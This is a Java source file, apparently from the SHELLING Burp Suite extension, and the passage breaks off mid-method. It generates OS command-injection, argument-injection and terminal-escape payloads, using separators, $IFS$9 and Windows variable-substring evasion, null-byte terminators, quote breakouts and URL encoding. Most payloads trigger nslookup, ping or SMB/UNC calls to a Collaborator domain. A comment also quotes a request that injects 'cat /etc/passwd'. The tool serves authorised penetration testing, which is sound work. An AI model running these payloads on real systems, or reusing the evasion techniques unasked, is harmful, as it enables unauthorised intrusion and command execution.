package uk.co.pentest.SHELLING;

import burp.BurpExtender;
import burp.IBurpExtenderCallbacks;
import burp.IHttpRequestResponse;
import burp.IIntruderPayloadGenerator;
import java.io.UnsupportedEncodingException;
import java.net.URLEncoder;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.logging.Level;
import java.util.logging.Logger;
import javax.swing.JOptionPane;
import javax.swing.ListModel;

/**
 *
 * @author julianh
 */
public final class IntruderPayloadGenerator implements IIntruderPayloadGenerator 
{
    IBurpExtenderCallbacks callbacks = BurpExtender.getBurpCallbacks();
    ShellingTab tab;
    
    int payloadIndex;                   // counter for the getNextPayload and hasMorePayloads methods
    boolean payloadMarking;             // whether or not to use payload marking    
    Integer cnt=0;                      // counter for the payload marker    
    String payloadType;                 // cmd or mark

    ArrayList<String> shellings;        // the final payloads
    ArrayList<String> shellings_raw;    // payloads before output encoding  
    ArrayList<String> basePayloads;     // my @BASE_PAYLOADS=($PAYL);
    String letters="abcdefghijklmnroqprstuvxyzACDEEFGHIJCKLMNROQPRSTUVXYZ";    

    ArrayList<String> argumentSeparators;        // my @ARGUMENT_SEPARATORS=('%20%20',"%09%09");
    ArrayList<String> commandSeparators;         // my @COMMAND_SEPARATORS=('%0a%0a','%26','|');
    ArrayList<String> commandTerminators;        // my @COMMAND_TERMINATORS=("%00",'%F0%9F%92%A9');
    ArrayList<String> nixCommandSeparators;
    ArrayList<String> nixArgumentSeparators;      
    ArrayList<String> nixCommandTerminators; // 
    ArrayList<String> winCommandTerminators; // 
    ArrayList<String> winCommandSeparators;
    ArrayList<String> winArgumentSeparators;
    ArrayList<String> winEchoArgumentSeparators;
    ArrayList<String> prefixes;
    ArrayList<String> prefixSuffixes;   
    ArrayList<String> argInjectionArguments;
    String command;
    String argument;
    String secondArgument="";
    String targetOS;
    String action;
    //String payload;                     // the base payload in high level form ({COMMAND}{SEPARATOR}{ARGUMENT})

    String winPayload;                  // the base payload in high level form ({COMMAND}{SEPARATOR}{ARGUMENT})
    String nixPayload;                  // will differ if the feedback channel is time (as opposed to DNS, whereas nslookup call looks exactly the same)
    String feedbackChannel;
    String mode="auto"; // possible values: auto (scanner + intruder), manual (intruder only)
    boolean argumentInjection;
    boolean last400Avoid=false;
   // boolean 
    public String loc=""; // collaboratorSession location (if in use)

    public IntruderPayloadGenerator(String payloadType, ShellingTab tab, String currentAction, IHttpRequestResponse baseRequestResponse, String insertionPointName)
    {
        // currentAction possible values
        // scanner
        // intruder
        // export
        
        // activeScan is true for Scanner calls only (as opposed to Intruder and external export calls)        
        // init from the arguments
        this.payloadType = payloadType;
        this.tab=tab;  
        
        if(!this.tab.shellingPanel.argInjectionCheckBox.isSelected()&&!this.tab.shellingPanel.doCommandInjection.isSelected()&&!this.tab.shellingPanel.doTerminalInjection.isSelected())
        {
            // message box
            if(this.tab.shellingPanel.warningDisplayed==false)
            {
                JOptionPane.showMessageDialog(null, "At least one attack (Command injection, Terminal injection or Argument injection) must be enabled!", "[SHELLING extension] At least one kind of injection payloads must be enabled!", JOptionPane.INFORMATION_MESSAGE);                                                    
                this.tab.shellingPanel.warningDisplayed=true; // avoid annoying message flooding
            }
            return;
        }
        this.tab.shellingPanel.warningDisplayed=false;
        
        this.tab.shellingPanel.curr_generator=this;
        this.action=currentAction; // so we know whether it's scanner, intruder or export.        
        
        // init from the UI
        this.mode=this.tab.shellingPanel.mode; // we know whether auto mode is on for Intruder and export.        
        this.targetOS=this.tab.shellingPanel.targetOS; 
        this.command=this.tab.shellingPanel.commandField.getText();
        this.argument=this.tab.shellingPanel.argumentField.getText().trim();
        this.feedbackChannel=this.tab.shellingPanel.feedbackChannel;
        if(this.tab.shellingPanel.payloadMarkingBox.isSelected())
        {
            this.payloadMarking=true;
        }
        else
        {
            this.payloadMarking=false;
        }                           
        
        // other init
        shellings=new ArrayList<String>();
        shellings_raw=new ArrayList<String>();
        basePayloads=new ArrayList<String>();        
        argumentSeparators=new ArrayList<String>();
        argumentSeparators=new ArrayList<String>();
        commandSeparators=new ArrayList<String>();         // my @COMMAND_SEPARATORS=('%0a%0a','%26','|');
        commandTerminators=new ArrayList<String>();        // my @COMMAND_TERMINATORS=("%00",'%F0%9F%92%A9');
        nixCommandSeparators=new ArrayList<String>();
        nixArgumentSeparators=new ArrayList<String>();
        nixCommandTerminators=new ArrayList<String>();
        winCommandTerminators=new ArrayList<String>();      // the new one, not included in the incompatible target-checking thingy
        winCommandSeparators=new ArrayList<String>();
        winArgumentSeparators=new ArrayList<String>();
        winEchoArgumentSeparators=new ArrayList<String>();

        prefixes=new ArrayList<String>();
        prefixSuffixes=new ArrayList<String>();
                
       
        this.prefixes.add("PREFIX_HOLDER"); // this will be replaced in a late (getNextPayload() in the IntruderPayloadGenerator) stage by the base payload
        this.prefixSuffixes.add("'");
        this.prefixSuffixes.add("\"");
        

      
        // in case of argument injection, we'll set argument to PARAM_INJECTION_STRING  ARGUMENT_SEPARATOR EVIL_PARAM , so it will follow the first occurrence of ARGUMENT_SEPARATOR        
        // OK, let's roll


        // mode="auto" switch only makes sense for intruder - it is always "auto" for the scanner
        // we need to make sure this setting does not fuck our scanning capabilities up - well, it gets read from the current panel setting, so I guess it's OK
        if(mode=="auto"||currentAction=="scanner") // only "auto" mode intruder sessions + scanner sessions are tracked by out collabSessions system!                             
        {
            if(feedbackChannel=="DNS")
            {                
                // register a new collaborator session to track
                this.loc = this.tab.shellingPanel.collabClient.generatePayload(true);  // OK, we need to know this for the scannner at least
                // let's grab the requestResponse base object!
                this.tab.shellingPanel.collabSessions.add(new collabSession(loc,currentAction, baseRequestResponse, insertionPointName)); // this UNKNOWN thing needs to be replaced with the last known URI seen in Intruder
                this.tab.shellingPanel.logOutput("Created a new collaborator session "+loc+" for "+currentAction+".");
                
                // ok, we would really love to find a way to get the base request response for the current intruder attack
                // but intruder does not expose this API, we are currently called by its registered payload generator
                // which is not being provided with anything useful and there is nothing we can directly call
                // which is a pity... all we are trying to do here is to easily track back all asynchronous interactions triggered by Intruder attacks
                // automatically - without the user having to manually run and poll the Collaborator Client (this is the entire purpose of the "auto" mode)
                // it's gonna be slightly difficult - we can trace the time (of execution), the payload number and the configuration at the time
                // plus the actual intruder attack timestamp (time of the new domain "loc" creation by the Collaborator)
                // so will still be traceable with Flow, it just sucks ass but it is still better than not having asynchro watch when using custom Intruder/Scanner payloads at all
                    
                command="nslookup";
                if(payloadMarking) 
                {
                    argument="PAYLOAD_MARK.BURP_COLLAB_DOMAIN";
                }
                else
                {
                    argument="BURP_COLLAB_DOMAIN";
                }                
                winPayload=nixPayload=command+"ARGUMENT_SEPARATOR"+argument;                
            }
            if(feedbackChannel=="time") // time explicitly 
            {
                // so we decided to switch to ping for both platforms, as only -n vs -t parameter differs between nix/win, so at least we have the same 
                // potential set of "bad characters"                
                command="ping"; // sleep$IFS$925 was getting false negatives, while the workaround sleep$IFS$9$((25)) requires additional char to work
                // ping$IFS$9-c$IFS$91$IFS$9127.0.0.1 has the same problem ($IFS$9 blending into 25 -> $925 and 127 -> $9127
                // we'll just simpler syntax (ping -c25 instead of ping -c 25) and localhost instead of 127                
                // we might wanna introduce more variants of these commands
                // like both ping$IFS$9-c25$IFS$9localhost AND sleep$IFS$9$((25))
                argument=Integer.toString(this.tab.shellingPanel.getDelay());
                secondArgument="localhost";
                winPayload="pingARGUMENT_SEPARATOR-nARGUMENT_SEPARATOR"+argument+"ARGUMENT_SEPARATOR127.0.0.2";
                nixPayload="pingARGUMENT_SEPARATOR-c"+argument+"ARGUMENT_SEPARATOR"+secondArgument;              
                
                // the results are in:
                // 25 packets transmitted, 25 received, 0% packet loss, time 24010ms
                // rtt min/avg/max/mdev = 0.018/0.031/0.051/0.010 ms
                // Execution took 24 seconds ... so, flew under the radar, we need to be more tolerant as 25 pings took only 24 seconds.
                // so, we keep the getDelay() value at its current level, we decrease the tolerance margin in the scanner
                // 
            }
            /*
            if(feedbackChannel=="file")    
            // once implemented, available both in the auto mode and for the scanner 
            // cause why not, although it would be a very rare scenario - auto scanning with FS access without knowin the target OS?
            // maybe for large-scale assessments involving multiple targets, but why not to support such scan for ALL OS?
            // this is one of the channels that requires different command patterns due to lack of compatible "command param" values.
            {                
            }
            if(feedbackChannel=="response") // to be implemented
            {                
            }
            */
        }
        else
        {
            winPayload=nixPayload=command+"ARGUMENT_SEPARATOR"+argument; // the base payload is the same, as no OS-specific or "auto" trickery
        }
        
        
        this.tab.shellingPanel.logOutput("Base payload: "+nixPayload+"\n");
        basePayloads.add(nixPayload);
        
        if(nixPayload!=winPayload)
        {
            this.tab.shellingPanel.logOutput("Base payload 2: "+winPayload+"\n");                  
            basePayloads.add(winPayload);
        } // print the second one if different
        
        // let's initiate the building element variables
        // universal argument separators
        this.argumentSeparators.add(" "); // space 
        this.argumentSeparators.add(this.byteToString((byte)0x09)); // 09, horizontal tab
        
        // universal command separators
        this.commandSeparators.add(this.byteToString((byte)0x0a));  // newline
        this.commandSeparators.add("&");                            // ampersand
        this.commandSeparators.add("|");                            // pipe


        
        // command/string terminators
        if(this.tab.shellingPanel.useTerminatorsCheckBox.isSelected())
        {                    
            if(this.tab.shellingPanel.includeThePooComboBox.isSelected()) 
            {
                this.commandTerminators.add("💩");
            }
            // the poo character, this should only work with asynchronous strings entering a mysql database first, should be disabled by default

            if(this.tab.shellingPanel.useNullByte.isSelected()==true)
            {
                this.commandTerminators.add(this.byteToString((byte)0x00));     // nullbyte
            }

            if(this.tab.shellingPanel.osSpecificTerminators.isSelected()) 
            {
                this.nixCommandTerminators.add(" #");
                this.winCommandTerminators.add("::");
                // this.winCommandTerminators.add("::"); WHY IS THIS NOT A THING? we'll have to investigate the incompatibleTypes function and prolly improve it
                // before we implement best-effort payloads
            }
            
            // get the custom terminators as well
            ListModel terminatorModel = this.tab.shellingPanel.terminatorList.getModel();
            // also make sure strings are in hex, e.g. by forcefully switching to hex mode
            this.tab.shellingPanel.switchToHex();
            for(int i=0;i<terminatorModel.getSize();i++)
            {
                String asciihex=terminatorModel.getElementAt(i).toString();
                // ok, now we need to convert it back to characters and store in the breakupTraversals array
                StringBuilder output = new StringBuilder();
                for (int j = 0; j < asciihex.length(); j+=2) 
                {
                    String str = asciihex.substring(j,j+2);
                    output.append((char)Integer.parseInt(str,16));
                }
                this.commandTerminators.add(output.toString());
            }
        }
        // OS-specific command separators
        // nix-like command separators
        this.nixCommandSeparators.add(";");                             // semicolon
        
        // nic-like argument separators
        this.nixArgumentSeparators.add("$IFS$9");                       // $IFS$9
        
        
        
        this.winCommandSeparators.add(this.byteToString((byte)0x1a));
        
        this.winArgumentSeparators.add(this.byteToString((byte)0x0b));
        this.winArgumentSeparators.add("%25ProgramFiles:~10,1%25");
        
        
        this.winEchoArgumentSeparators.add("(");
        this.winEchoArgumentSeparators.add(".");    
        
        this.winCommandSeparators.add(this.byteToString((byte)0x26)+"::");
        

        
        if("nix".equals(targetOS)||"all".equals(targetOS))
        {
            this.basePayloads.add("$("+nixPayload+")");
            this.basePayloads.add("`"+nixPayload+"`");
            if(this.secondArgument=="")
            {
                this.basePayloads.add("{"+command+","+argument+"}");// the brace operator
            }
            else
            {
                this.basePayloads.add("{"+command+","+argument+","+secondArgument+"}");// the brace operator
            }
            
            for(int i=0;i<this.nixCommandSeparators.size();i++)
            {
                this.commandSeparators.add(this.nixCommandSeparators.get(i));
            }
            for(int i=0;i<this.nixArgumentSeparators.size();i++)
            {
                this.argumentSeparators.add(this.nixArgumentSeparators.get(i));
            } 
        }
        
        if("win".equals(targetOS)||"all".equals(targetOS))
        {        
            this.basePayloads.add(winPayload);
            
            for(int i=0;i<this.winCommandSeparators.size();i++)
            {
                this.commandSeparators.add(this.winCommandSeparators.get(i));
            }            
            for(int i=0;i<this.winArgumentSeparators.size();i++)
            {
                this.argumentSeparators.add(this.winArgumentSeparators.get(i));
            }             
        }
        
        // so, the OS-specific command terminators are not propagated to commandTerminators yet (and I have an impression like they should be)
        // 
        if("win".equals(targetOS)||"all".equals(targetOS))
        {
            for(int i=0;i<winCommandTerminators.size();i++)
            {
                this.commandTerminators.add(winCommandTerminators.get(i)); // 
            }
        }
        if("nix".equals(targetOS)||"all".equals(targetOS))
        {
            for(int i=0;i<nixCommandTerminators.size();i++)
            {
                this.commandTerminators.add(nixCommandTerminators.get(i)); // 
            }
        }
        
        // automatically prefix prefixes with quotes in order to gain quoted injection compatibility
        ArrayList<String> tmpPrefixes=new ArrayList<>();
        tmpPrefixes=(ArrayList<String>)prefixes.clone();
        for(int i=0;i<tmpPrefixes.size();i++)
        {
            for(int j=0;j<prefixSuffixes.size();j++)
            {
                prefixes.add(tmpPrefixes.get(i)+this.prefixSuffixes.get(j));
            }
        }              
                
        //1. DO ARGUMENT INJECTIONS HERE
        
        if(this.tab.shellingPanel.argInjectionCheckBox.isSelected())
        {
           this.generateArgumentInjectionPayloads();
        }
        
        // 2. TERMINAL INJECTIONS TO FOLLOW
        if(this.tab.shellingPanel.doTerminalInjection.isSelected())
        {
              this.generateTerminalInjectionPayloads();
        }
        
        // 3. COMMAND INJECTION NOW
        if(this.tab.shellingPanel.doCommandInjection.isSelected())
        {
            this.generateCommandInjectionPayloads();
        }
        
        // OK, what's left now is the output encoding + payload marking        
        this.encodeOutput();  
        
        // update the payload counter
         this.tab.shellingPanel.jTabbedPane1.setTitleAt(5,"Save "+this.shellings.size()+" payloads");
    }
    private void generateTerminalInjectionPayloads()
    {
        /*
        curl -kis http://www.example.com/%1b%5d%32%3b%6f%77%6e%65%64%07%0a
        %1b%5d%32%3b + MALICIOUS COMMAND + %07%0a
        */        
        byte[] prefix={(byte)0x1b,(byte)0x5d,(byte)0x32,(byte)0x3b};
        byte[] suffix={(byte)0x07,(byte)0x0a};
        
        for(int i=0;i<this.argumentSeparators.size();i++)
        {
            for(int j=0;j<this.basePayloads.size();j++)
            {
               String myCurrPayload=this.basePayloads.get(j);
               if(this.incompatibleTargets(this.argumentSeparators.get(i), myCurrPayload, "separator"))
               {
                   continue; 
               }
               myCurrPayload=myCurrPayload.replace("ARGUMENT_SEPARATOR",this.argumentSeparators.get(i));               
               this.shellings_raw.add(this.callbacks.getHelpers().bytesToString(prefix)+myCurrPayload+this.callbacks.getHelpers().bytesToString(suffix));
           }
        }             
    }
    private void generateCommandInjectionPayloads()
    {
        // 1) First, we fill our output payloads list wth all variations of base payloads, including different argument separators
        if(this.tab.shellingPanel.basePayloadCheckBox.isSelected()==true)
        {
            for(int i=0;i<this.argumentSeparators.size();i++)
            {
                for(int j=0;j<this.basePayloads.size();j++)
                {
                    String myCurrPayload=this.basePayloads.get(j);
                    if(this.incompatibleTargets(this.argumentSeparators.get(i), myCurrPayload, "separator"))
                    {
                        continue; 
                    }
                    myCurrPayload=myCurrPayload.replace("ARGUMENT_SEPARATOR",this.argumentSeparators.get(i));               
                    if(!this.shellings_raw.contains(myCurrPayload)) this.shellings_raw.add(myCurrPayload);               
                }
            }                    
            this.basePayloads=(ArrayList<String>)this.shellings_raw.clone();   // overwrite the base with different base command_separator variants        
        }
        
        // 2) MALICIOUS_COMMAND+COMMAND_TERMINATOR 
        if(this.tab.shellingPanel.secondBasePayloadCheckBox.isSelected())
        {
            for(int i=0;i<this.basePayloads.size();i++)
            {
                for(int j=0;j<this.commandTerminators.size();j++)
                {   
                    if(this.incompatibleTargets(this.commandTerminators.get(j),this.basePayloads.get(i), "terminator"))
                    {
                        continue;
                    }
                    String currPayload=this.basePayloads.get(i)+this.commandTerminators.get(j);
                    if(!this.shellings_raw.contains(currPayload)) this.shellings_raw.add(currPayload);
                }
                for(int j=0;j<this.commandSeparators.size();j++)
                {
                    if(this.incompatibleTargets(this.commandSeparators.get(j),this.basePayloads.get(i), "separator"))
                    {
                        continue;
                    }                
                    if(!this.shellings_raw.contains(this.basePayloads.get(i)+this.commandSeparators.get(j))) this.shellings_raw.add(this.basePayloads.get(i)+this.commandSeparators.get(j));                             
                }
            }
        }
        // 3) COMMAND_SEPARATOR+MALICIOUS_COMMAND
        if(this.tab.shellingPanel.thirdBasePayloadCheckBox.isSelected()==true)
        {
            for(int i=0;i<this.basePayloads.size();i++)
            {   
                for(int j=0;j<this.commandSeparators.size();j++)
                {
                    if(this.incompatibleTargets(this.commandSeparators.get(j),this.basePayloads.get(i),"separator"))
                    {
                        continue;
                    }   
                    if(!this.shellings_raw.contains(this.commandSeparators.get(j)+this.basePayloads.get(i))) this.shellings_raw.add(this.commandSeparators.get(j)+this.basePayloads.get(i));                                
                }
            }
        }
        // 4) COMMAND_SEPARATOR+MALICIOUS_COMMAND+COMMAND_SEPARATOR
        // I think this makes the above section 3) redundant, because:
        // - if the application is appending our payload with something, 3) will fail, while 4) will work
        // - if the application is not accepting COMMAND_SEPARATOR, both variants will fail, so 3) is not helping anyway
        // - if the application is rejecting values that do not end with alphanum (which is how any of our MALICIOUS_COMMANDS would end), 4) will fail - but this is why we have the + SUFFIX variant - 5) - right?
        if(this.tab.shellingPanel.fourthBasePayloadCheckBox.isSelected()==true)
        {
            for(int i=0;i<this.basePayloads.size();i++)
            {
                for(int j=0;j<this.commandSeparators.size();j++)
                {
                    if(this.incompatibleTargets(this.commandSeparators.get(j),this.basePayloads.get(i),"separator"))
                    {
                        continue;
                    }   
                    //this.shellings_raw.add(this.commandSeparators.get(j)+this.basePayloads.get(i)+this.commandSeparators.get(j));   
                    if(!this.shellings_raw.contains(this.commandSeparators.get(j)+this.basePayloads.get(i)+this.commandSeparators.get(j))) this.shellings_raw.add(this.commandSeparators.get(j)+this.basePayloads.get(i)+this.commandSeparators.get(j));                
                }
            }
        }
        // 5) COMMAND_SEPARATOR+MALICIOUS_COMMAND+COMMAND_SEPARATOR+SUFFIX            
        if(this.tab.shellingPanel.fifthBasePayloadCheckBox.isSelected())
        {
            for(int i=0;i<this.basePayloads.size();i++)
            {
                for(int j=0;j<this.commandSeparators.size();j++)
                {
                    if(this.incompatibleTargets(this.commandSeparators.get(j),this.basePayloads.get(i),"separator"))
                    {
                        continue;
                    }   
                    for(int k=0;k<this.prefixes.size();k++)
                    {
                        String suffix=this.prefixes.get(k);
                        if(suffix=="'"||suffix=="") 
                        {
                            continue; //skip irrelevant payloads                  
                        }                  
                        if(!this.shellings_raw.contains(this.commandSeparators.get(j)+this.basePayloads.get(i)+this.commandSeparators.get(j)+suffix)) this.shellings_raw.add(this.commandSeparators.get(j)+this.basePayloads.get(i)+this.commandSeparators.get(j)+suffix);                             
                    }
                }
            }
        }
        // 6) PREFIX+COMMAND_SEPARATOR+MALICIOUS_COMMAND+COMMAND_SEPARATOR
        if(this.tab.shellingPanel.sixthBasePayloadCheckBox.isSelected())
        {
            for(int i=0;i<this.basePayloads.size();i++)
            {
                for(int j=0;j<this.commandSeparators.size();j++)
                {
                    if(this.incompatibleTargets(this.commandSeparators.get(j),this.basePayloads.get(i),"separator"))
                    {
                        continue;
                    }    
                    for(int k=0;k<this.prefixes.size();k++)
                    {
                        String currPayload=this.prefixes.get(k)+this.commandSeparators.get(j)+this.basePayloads.get(i)+this.commandSeparators.get(j);
                        if(currPayload.contains("'"))
                        {
                            currPayload=currPayload+"'";
                        }
                        else if(currPayload.contains("\""))
                        {
                            currPayload=currPayload+"\"";
                        }
                        if(!this.shellings_raw.contains(currPayload)) this.shellings_raw.add(currPayload);
                    }
                }
            }
        }
        
        // 7) PREFIX+COMMAND_SEPARATOR+MALICIOUS_COMMAND+COMMAND_SEPARATOR+SUFFIX      
        if(this.tab.shellingPanel.seventhBasePayloadCheckBox.isSelected())
        {
            for(int i=0;i<this.basePayloads.size();i++)
            {
                for(int j=0;j<this.commandSeparators.size();j++)
                {
                    if(this.incompatibleTargets(this.commandSeparators.get(j),this.basePayloads.get(i),"separator"))
                    {
                        continue;
                    }   
                    for(int k=0;k<this.prefixes.size();k++)
                    {
                        String suffix=this.getProperSuffix(this.prefixes.get(k));                 
                        if(!this.shellings_raw.contains(this.prefixes.get(k)+this.commandSeparators.get(j)+this.basePayloads.get(i)+this.commandSeparators.get(j)+suffix)) this.shellings_raw.add(this.prefixes.get(k)+this.commandSeparators.get(j)+this.basePayloads.get(i)+this.commandSeparators.get(j)+suffix);                              
                    }
                }
            }    
        }
        
        // 8) PREFIX+MALICIOUS_COMMAND+SUFFIX for substitutions - `CMD` and $(CMD)         
        for(int i=0;i<this.basePayloads.size();i++)
        {
            for(int j=0;j<this.prefixes.size();j++)
            {
                String basePayload=this.basePayloads.get(i);   
                if(!basePayload.startsWith("$")&&!basePayload.startsWith("`"))
                {                   
                    continue;
                }
                String prefix=this.prefixes.get(j);
                String suffix=this.getProperSuffix(prefix);
                if(!this.shellings_raw.contains(prefix+basePayload+suffix)) this.shellings_raw.add(prefix+basePayload+suffix);
            }
        }                       
    }
    private void generateArgumentInjectionPayloads()
    {
        if(this.tab.shellingPanel.feedbackChannel!="DNS") return; // return quietly (at the moment this feature is only available while using DNS as the feedback chan)
        argInjectionArguments=new ArrayList<String>();
        String domain="BURP_COLLAB_DOMAIN";
        if(payloadMarking) 
        {
            domain="PAYLOAD_MARK."+domain;
        }
        
        if(this.tab.shellingPanel.injectHTTPCheckBox.isSelected())
        {
            argInjectionArguments.add("http://"+domain+"/PAYLOAD_MARK");
        }
        if(this.tab.shellingPanel.injectSmbCheckBox.isSelected())
        {
            argInjectionArguments.add("smb://"+domain+"/PAYLOAD_MARK");
        }
        if(this.tab.shellingPanel.injectFileCheckBox.isSelected())
        {
            argInjectionArguments.add("file://"+domain+"/PAYLOAD_MARK");
        }
        if(this.tab.shellingPanel.uncPathsCheckBox.isSelected()&&this.targetOS!="nix") // "win" or "all"
        {
            argInjectionArguments.add("\\\\"+domain+"\\PAYLOAD_MARK");
        }        
        // this method fills the shellings_raw() structure with argument injection payloads
        // implemented to make Argument injection independent from Command injection (so either of the attacks or both can be enabled)
        // also, the class constructor is getting too big
            /*
            soon to be implemented, temporarily commented out
            if(command.equals("echo"))          
            {
                for(int i=0;i<this.winEchoArgumentSeparators.size();i++)
                {
                    this.argumentSeparators.add(this.winEchoArgumentSeparators.get(i));
                    this.winArgumentSeparators.add(this.winEchoArgumentSeparators.get(i));
                } 
            }
            */
            
        // 0# BEFORE-FIRST METHOD
        if(this.tab.shellingPanel.injectAdditionalArguments.isSelected())
        {
            // iterate over argument separators
            String myCurrPayload="";
            for(int i=0;i<this.argumentSeparators.size();i++)
            {   
                // iterate over prefixes
                for(int j=0;j<this.prefixes.size();j++)
                {                    
                    //   iterate over terminators                         
                    // we use command terminators as argument terminators here - should work the same (e.g. nullbyte, one-line comment, poo)
                        // could also do PREFIX + ARGUMENT + TERMINATOR variant straig away instead of PREFIX + SEPARATOR + ARGUMENT + TERMINATOR
                        // but I assume all direct injections like ARGUMENT whereas ARGUMENT is e.g. http://BURP_COLLAB_DOMAIN are detected by the Scanner anyway
                        // so it would be rather redundant, however is required for exported payload sets
                        // hence it deserves a separate checkbox in the UI (not implemented yet)
                        myCurrPayload=this.prefixes.get(j)+this.argumentSeparators.get(i);
                        for(int k=0;k<this.argInjectionArguments.size();k++)
                        {
                            // iterate over protocols (arguments to inject)
                            this.shellings_raw.add(myCurrPayload+this.argInjectionArguments.get(k));                                                        
                            // does not matter, terminators should be empty if this box was not selected
                            //if(this.tab.shellingPanel.useTerminatorsCheckBox.isSelected())
                            //{
                                for(int l=0;l<this.commandTerminators.size();l++)
                                {
                                    this.shellings_raw.add(myCurrPayload+this.argInjectionArguments.get(k)+this.commandTerminators.get(l));    
                                }                            
                            //}
                        }
                }         
            }                       
        }
        
        
        // 1# FIRST METHOD
        // this should be turned into a set of pickable profiles, e.g. wget, ping, ls
        // GET /test_cases/GET/arginj_escape_shell_cmd.php?dir='*'%20-exec%20cat%20/etc/passwd%20\; HTTP/1.1
        // which, as we find out, does not make any sense, since it requires a semicolon to be allowed - which is a command separator, we would not need arg injection
        // if this was working        
        // 
        // we still WANT our windows things: 
        // /c 
        
        
        // OK here it is implemented, our UNC thingy!
        // > UNC thingy :D
        if(this.tab.shellingPanel.uncPathsCheckBox.isSelected())
        {
            // iterate over prefixes
            String myPayload=">\\\\"+domain+"\\PAYLOAD_MARK";
            for(int j=0;j<this.prefixes.size();j++)
            {   
                this.shellings_raw.add(this.prefixes.get(j)+myPayload); // add non-terminated version                
                String suffix=this.getProperSuffix(this.prefixes.get(j));
                for(int l=0;l<this.commandTerminators.size();l++) 
                {
                    // now, implement the literal nullbyte check
                    // if(this.commanTerminators)
                    // OK, there is no way to do this here
                    // unless we move the encoding layer from the end to the basic payload building chars layer (like in psychoPATH)
                    // we'd have to implement this in encodeOutput() instead
                    this.shellings_raw.add(this.prefixes.get(j)+myPayload+this.commandTerminators.get(l));                                                                                       
                    this.shellings_raw.add(this.prefixes.get(j)+myPayload+suffix+this.commandTerminators.get(l)); // let's see what happens                                     
                }
            }                                                   
        }
        
        // OK, so find is immune to this
        // how about wget --execute command http://URL?
        // 

        
        // #2 SECOND METHOD
        if(this.tab.shellingPanel.bruteArgInjections.isSelected())
        {                        
            // this should be customised (so users can provide their own flags array (string)
            if(this.tab.shellingPanel.defaultArgBruteRange.isSelected()==false) // this means the other one is true
            {
                this.letters=this.tab.shellingPanel.customCharacterRange.getText();
            }
            String myCurrPayload="";
            for(int i=0;i<this.argumentSeparators.size();i++)
            {   
                // iterate over prefixes
                for(int j=0;j<this.prefixes.size();j++)
                {                    
                    //   iterate over terminators                         
                    // we use command terminators as argument terminators here - should work the same (e.g. nullbyte, one-line comment, poo)
                    // could also do PREFIX + ARGUMENT + TERMINATOR variant straig away instead of PREFIX + SEPARATOR + ARGUMENT + TERMINATOR
                    // but I assume all direct injections like ARGUMENT whereas ARGUMENT is e.g. http://BURP_COLLAB_DOMAIN are detected by the Scanner anyway
                    // so it would be rather redundant, however is required for exported payload sets
                    // hence it deserves a separate checkbox in the UI (not implemented yet)
                    myCurrPayload=this.prefixes.get(j)+this.argumentSeparators.get(i);
                    for(int l=0;l<letters.length();l++)
                    {
                        for(int k=0;k<this.argInjectionArguments.size();k++)
                        {
                            // iterate over protocols (arguments to inject)
                            if(targetOS=="win"||targetOS=="all")
                            {
                                this.shellings_raw.add(myCurrPayload+"/"+letters.charAt(l)+this.argumentSeparators.get(i)+this.argInjectionArguments.get(k));                                
                                for(int m=0;m<this.commandTerminators.size();m++)
                                {
                                    this.shellings_raw.add(myCurrPayload+"/"+letters.charAt(l)+this.argumentSeparators.get(i)+this.argInjectionArguments.get(k)+this.commandTerminators.get(m));    
                                }   
                            }
                            if(targetOS=="nix"||targetOS=="all")
                            {
                                this.shellings_raw.add(myCurrPayload+"-"+letters.charAt(l)+this.argInjectionArguments.get(k));                                
                                for(int m=0;m<this.commandTerminators.size();m++)
                                {
                                    this.shellings_raw.add(myCurrPayload+"-"+letters.charAt(l)+this.argInjectionArguments.get(k)+this.commandTerminators.get(m));    
                                }                                       
                            }
                       
                        }                            
                    }
                }         
            }                                                                 
        }                
    }    
    private void encodeOutput()
    {
        // now we have to deal with the output encodings
        ListModel encodeModel = this.tab.shellingPanel.encodeList.getModel();
        for(int j=0;j<this.shellings_raw.size();j++)
        {
            for(int i=0;i<encodeModel.getSize();i++)
            {
                // check for nullbytes and skip them if the setting says so (only applicable here, for none)
                if("None".equals(encodeModel.getElementAt(i).toString()))
                {                   
                    // baddies avoidance
                    // includeWhites is selected AND the smart mode is on AND (the last response was 400 AND the payload contained such a char)
                    // last check remaining is the 400 status to avoid race conditions (this info has to be held in each scanner instance separately
                    // and somehow retrieved in this function so we know when to perform the avoidance
                    if(mode=="scanner"&&this.tab.shellingPanel.includeLiteralWhites.isSelected()==false&&this.tab.shellingPanel.smart400Avoidance.isSelected()==true) 
                    {
                        byte[] tmp = this.callbacks.getHelpers().stringToBytes(this.shellings_raw.get(j));
                        if(this.tab.shellingPanel.containsBaddies(tmp))
                        {
                            continue; // skip to the next encodeModel
                        }
                    }
                    
                    String outputPayload=this.getMarkedVersion(this.shellings_raw.get(j));
                    this.shellings.add(outputPayload);
                }
                if("URL".equals(encodeModel.getElementAt(i).toString())) // URL encode
                {
                   String outputPayload=this.getMarkedVersion(this.shellings_raw.get(j));
                   try {                    
                    this.shellings.add(URLEncoder.encode(outputPayload,StandardCharsets.UTF_8.toString()));
                    } 
                   catch (UnsupportedEncodingException ex) {
                      Logger.getLogger(IntruderPayloadGenerator.class.getName()).log(Level.SEVERE, null, ex);
                    }
                }
                if("Double URL".equals(encodeModel.getElementAt(i).toString()))
                {
                       String outputPayload=this.getMarkedVersion(this.shellings_raw.get(j));
                       try {                       
                           this.shellings.add(URLEncoder.encode(URLEncoder.encode(outputPayload,StandardCharsets.UTF_8.toString())));
                       } 
                       catch (UnsupportedEncodingException ex) {
                           Logger.getLogger(IntruderPayloadGenerator.class.getName()).log(Level.SEVERE, null, ex);
                       }
                }
            }
        }
    }
    // search the current collabSession, matching by the domain name
    // set the base IHttpRequestResponse so it can be retrieved later on if an interaction is hit    
    public boolean setBase(IHttpRequestResponse base)
    {
        boolean ret = false;
        for(int i=this.tab.shellingPanel.collabSessions.size()-1;i>-1;i--)
        {
           if(this.tab.shellingPanel.collabSessions.get(i).collabLoc==this.loc)
           {
                ret=true;
                this.tab.shellingPanel.collabSessions.get(i).setReqResp(base);
           }
        }
        return ret;
    }
    private String getMarkedVersion(String payload)
    {        
        cnt++;
        if(this.payloadMarking)
        {
            String replacement=cnt.toString();
            if(payload.contains("$IFS$9")) // if dealing with $IFS$9
            {
                replacement="a"+replacement;
            }   
            payload=payload.replace("PAYLOAD_MARK",replacement);
        }
        else
        {
            payload=payload.replace("PAYLOAD_MARK","");
        }
        return payload;
    }
    private String byteToString(byte inputByte)
    {
        byte[] t = new byte[1];
        t[0]=inputByte;
